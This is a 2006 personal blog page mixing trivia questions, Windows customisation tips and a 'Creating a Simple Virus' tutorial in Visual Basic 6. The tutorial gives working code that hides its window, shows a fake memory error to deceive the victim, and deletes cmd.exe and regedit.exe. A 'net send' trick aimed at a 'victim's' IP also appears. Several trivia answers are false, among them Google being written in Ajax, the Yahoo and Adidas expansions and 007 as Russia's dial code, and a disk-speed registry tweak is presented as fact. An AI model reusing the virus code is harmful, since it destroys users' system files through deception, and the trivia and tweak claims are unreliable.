Thursday, August 17, 2006

Did u ever know this....

1. What programming language is GOOGLE developed in?
Google is written in Asynchronous java-script and XML, or its acronym Ajax.

2. What is the expansion of YAHOO?
Yet Another Hierarchy of Officious Oracle

3. What is the expansion of ADIDAS?
ADIDAS- All Day I Dream About Sports

4. Expansion of Star as in Star TV Network?
Satellite Television Asian Region

5. What is expansion of "ICICI?"
Industrial credit and Investments Corporation of India

6. What does "baker's dozen" signify?
A baker's dozen consists of 13 items - 1 more than the items in a normal dozen

7. The 1984-85 season. 2nd ODI between India and Pakistan at Sialkot-India 210/3 with Vengsarkar 94*. Match abandoned. Why?
That match was abandoned after ppl heard the news of indira gandhi being killed.

8. Who is the only man to have written the National Anthems for two different countries?
Rabindranath Tagore who wrote national anthem for two different countries one is our 's National anthem and another one is for Bangladesh-(Amar Sonar Bangla)

9. From what four word ex-pression does the word `goodbye` derive?
Goodbye comes from the ex-pression: 'god be with you'.

10. How was Agnes Gonxha Bojaxhiu better known?
Agnes Gonxha Bojaxhiu is none other Mother Teresa.

11. Name the only other country to have got independence on Aug 15th?
South Korea.

12. Why was James Bond Associated with the Number 007?
Because 007 is the ISD code for Russia (or the USSR, as it was known during the cold war)

13. Who faced the first ball in the first ever One day match?
Geoffrey Boycott

14. Which cricketer played for South Africa before it was banned from international cricket and later represented Zimbabwe?
John Traicos

15. The faces of which four Presidents are carved at Mt.Rushmore?
George Washington, Thomas Jefferson, Theodore Roosevelt, and Abraham Lincoln

16. Which is the only country that is surrounded from all sides by only one country (other than Vatican)?
Lesotho surrounded from all sides by South Africa.

17. Which is the only sport which is not allowed to play left handed?
Polo

Pop up a Message on Victim's Computer

net send 127.0.0.1 message

replace 127.0.0.1 with the victims ip
Njoi....

To insert Processor Manufacturer and Model

Open "c:\windows\system\Oeninfo.ini" file with notepad or any test editor.
Type following in the file:
_________________________
[general]
Manufacturer= Intel®
Model= Pentium® 4
_________________________

(To type "®" press 0,1,7,4 one after another while holding alt key)

Replace Intel® and Pentium® 4 by your Model and Processor
Save the file. All done!
Now right click on "My Computer" Icon and left click "Properties"

(NOTE: It is necessary to backup your original oemlogo.bmp or oeminfo.ini if they exist.)

Inserting your own Logo in Sytem Properties

Create any logo/image with your favourite image editor with Maximum dimensions 180*114.
(Greater Dimensions are OK but some area of image will not be displayed in logo)

Save it to "c:\windows\system\oemlogo.bmp" as standard BMP format. (In directory c:\windows\system)

All done! Now right click on "My Computer" Icon and left click "Properties"

(NOTE: It is necessary to backup your original oemlogo.bmp if it exist.)

Visual Basic 6 – Creating a Simple Virus

Now many of you feel that creating a virus is impossible especially for you beginners. Well this tutorial shows you how to create a simple virus with just a few lines of code. A virus can be an application that deletes files upon request, this is seen as infecting your computer because by deleting key files you may need to take action to get your computer back to normal.
First of all open a new Visual Basic project, a standard exe file..

Now it depends on how you want your virus to work, I feel it is best if it is activated once your application is opened so the main code codes in the form load sub.

On your project insert a text box , a command button and a timer, we will be using the command button and timer a little later on.

In the project put in the file you want to delete, for example if you wanted to delete the command file then you would put the following code in the form load tab.

Private Sub Form_Load()
Text1.Text = “C:/Windows/System32/cmd.exe
Kill Text1.Text
End Sub

Once the project is opened then the command file will be removed.

Now I will show you an example of doing this using a command button. Put the following code in the command button and in the form load.

You can even give the text box a name to make it quicker. I have labelled it ‘A’

Private Sub Form_Load()
Text1.Text = “C/Windows/System32/cmd.exe”
A = Text1.Text
End Sub

Private Sub Command1_Click
Kill A
End Sub

Now once the command button is clicked on the project the command file will be deleted.

Now we will use the timer in this one. If you want to disguise your scheme then this is a good way to do it, Here we will send a fake message error pretending the application hasn’t got enough memory to run, but in actual fact the victim doesn’t know that you have just removed their command file.

Here is to go about it…

Private Sub Form_Load()
Form1.Visible = False
Text1.Text = “C:/Windows/System32/cmd.exe”
A = Text1.Text
Msgbox (“Runtime Error 492. Not Enough Memory.”), vbCritical, “Runtime Error”
End Sub

Private Sub Timer1_Timer()
Timer1.Interval = 5000
Kill A
Timer1.Enabled = False
End Sub

All we have done above is made the form invisible so that it makes the error message look real, we have set an interval of 5 seconds on the timer before the file is deleted and that’s how simple it can be to fool someone.

Right, we can now make it a little more difficult if you are finding the above a little too easy.

How about removing more than 1 file, well this is how you could go about doing that, we will stick with the message box fool because I think that works well.

The example below shows how to remove the files when the application is loaded, we will not be using timers or command buttons in this one. We will not even be using text boxes because they are not needed, you can just do what is shown below.

So in the form load part put the following code.

Private Sub Form_Load()
Form1.Visible = False
Msgbox (“Runtime Error 492. Not Enough Memory.”), vbCritical, “Runtime Error”
Kill “C:/Windows/System32/cmd.exe”
Kill “C:/Windows/regedit.exe”
End Sub

So above we will be removing the command file and the registry, I don’t think the victim will be best pleased about that do you.

Now I have shown you the above information I think it’s your turn to try and create your own, now you can test it on your own pc, just copy a file, lets say the cmd.exe file and paste it into your C:/

Then put in the code above but in the Kill put this…

Kill “C:/cmd.exe”

Sunday, August 13, 2006

Increase your harddisk speed

To speed up your hard disk speed we need to configure a special buffer in the computer's memory in order to enable it to better deal with interrupts made from the disk.
This tip is only recommended if you have 256MB RAM or higher.

Follow these steps:
Run SYSEDIT.EXE from the Run command.
Expand the system.ini file window.
Scroll down almost to the end of the file till you find a line called [386enh].
Press Enter to make one blank line, and in that line type
Irq14=4096
Note: This line IS CASE SENSITIVE!!!
Click on the File menu, then choose Save.
Close SYSEDIT and reboot your computer.
Done. Speed improvement will be noticed after the computer reboots.
Update: The most speed improvement is visible with IDE drives, however there are reports that this tweak also does good for SCSI disks. In any case, it won't harm your system, so why not try it yourself and let me know what you find.

Free Voicemail through Email

Guys check out this
http://www.nowpos.com/
Free voice mail facility through email no need to download any softwares, simply open account then compose and send.

Bid goodbye to the keyboard. The "No More Typing" mail is here. Just Talking... and Listening!

You Speak!
You can Talk!
You may Sing!
You will Emote!

With NowPos vMail on your side, They will Listen.

Blogger's Lounge

Blogger's Lounge